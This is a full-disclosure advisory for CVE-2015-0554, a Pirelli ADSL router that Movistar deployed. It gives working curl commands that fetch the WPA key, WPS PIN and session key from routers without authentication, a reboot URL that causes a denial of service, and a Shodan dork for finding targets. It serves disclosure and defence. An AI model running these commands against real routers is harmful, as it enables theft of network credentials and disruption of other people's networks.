- Title: CVE-2015-0554 ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001N remote information disclosure HomeStation Movistar - Author: Eduardo Novella @enovella_ ednolo[@]inf.upv[dot]es - Version: Tested on firmware version PDG_TEF_SP_4.06L.6 - Shodan dork : + "Dropbear 0.46 country:es" ( From now on it looks like not working on this way) - Summary: HomeStation movistar has deployed routers manufactured by Pirelli. These routers are vulnerable to fetch HTML code from any IP public over the world. Neither authentication nor any protection to avoid unauthorized extraction of sensitive information. - The vulnerability and the way to exploit it: $ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "WLAN_" <option value='0'>WLAN_DEAD</option> $ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var wpapskkey" var wpaPskKey = 'IsAklFHhFFui1sr9ZMqD'; $ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var WscDevPin" var WscDevPin = '12820078'; $ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var sessionkey" var sessionKey='1189641421'; $ curl -s http://${IP_ADDRESS}/wlcfg.html | grep -i "bssid:" -A 3 <td width="50">BSSID:</td> <td> DC:0B:1A:XX:XX:XX </td> # Rebooting the router remotely and provoking a Denial of Service #----------------------------------------------------------------- http://${IP_ADDRESS}/resetrouter.html We can observe at the source: <!-- hide var sessionKey='846930886'; function btnReset() { var loc = 'rebootinfo.cgi?'; loc += 'sessionKey=' + sessionKey; var code = 'location="' + loc + '"'; eval(code); } // done hiding --> http://${IP_ADDRESS}/rebootinfo.cgi?sessionKey=233665123 # All the information what we can fetch from. #---------------------------------------------- webs$ ls adslcfgadv.html diagpppoe.html ipv6lancfg.html qoscls.html statsatmreset.html adslcfgc.html dlnacfg.html js qosqmgmt.html statsifc.html adslcfg.html dnscfg.html jsps qosqueueadd.html statsifcreset.html adslcfgtone.html dnsproxycfg.html lancfg2.html qsmain.html statsmocalanreset.html algcfg.html dsladderr.html languages quicksetuperr.html statsmocareset.html APIS dslbondingcfg.html lockerror.html quicksetup.html statsmocawanreset.html atmdelerr.html enblbridge.html logconfig.html quicksetuptesterr.html statsvdsl.html backupsettings.html enblservice.html logintro.html quicksetuptestsucc.html statsvdslreset.html berrun.html engdebug.html logobkg.gif rebootinfo.html statswanreset.html berstart.html ethadderr.html logoc.gif resetrouter.html statsxtmreset.html berstop.html ethdelerr.html logo_corp.gif restoreinfo.html storageusraccadd.html certadd.html footer.html logo.html routeadd.html stylemain.css certcaimport.html hlpadslsync.html logomenu.gif rtdefaultcfgerr.html threeGPIN.html certimport.html hlpatmetoe.html main.html rtdefaultcfg.html todadd.html certloadsigned.html hlpatmseg.html menuBcm.js scdmz.html tr69cfg.html cfgatm.html hlpethconn.html menu.html scinflt.html updatesettings.html cfgeth.html hlppngdns.html menuTitle.js scmacflt.html upload.html cfgl2tpac.html hlppnggw.html menuTree.js scmacpolicy.html uploadinfo.html cfgmoca.html hlppppoasess.html mocacfg.html scoutflt.html upnpcfg.html cfgptm.html hlppppoeauth.html multicast.html scprttrg.html url_add.html colors.css hlppppoeconn.html natcfg2.html scripts util.js config.json.txt hlppppoeip.html ntwksum2.html scvrtsrv.html wanadderr.html css hlptstdns.html omcidownload.html seclogintro.html wancfg.html ddnsadd.html hlpusbconn.html omcisystem.html snmpconfig.html wlcfgadv.html defaultsettings.html hlpwlconn.html password.html sntpcfg.html wlcfg.html dhcpinfo.html html portmapadd.html standby.html wlcfgkey.html diag8021ag.html ifcdns.html portmapedit.html StaticIpAdd.html wlmacflt.html diagbr.html ifcgateway.html portName.js StaticIpErr.html wlrefresh.html diag.html images pppoe.html statsadslerr.html wlsecurity.html diagipow.html index.html pradd.html statsadsl.html wlsetup.html diaglan.html info.html ptmadderr.html statsadslreset.html wlwapias.html diagmer.html ipoacfg.html ptmdelerr.html statsatmerr.html xdslcfg.html diagpppoa.html ippcfg.html pwrmngt.html statsatm.html + Conclusion: This vulnerability can be exploited remotely and it should be patched as soon as possible. An attacker could be monitoring our network or even worse being a member of a botnet without knowledge of it. First mitigation could be either try to update the last version for these routers or install 3rd parties firmwares as OpenWRT or DDWRT on them. + References: http://packetstormsecurity.com/files/115663/Alpha-Networks-ADSL2-2-Wireless-Router-ASL-26555-Password-Disclosure.html + Timeline: 2013-04-xx Send email to Movistar and Pirelli 2015-01-05 Full disclosure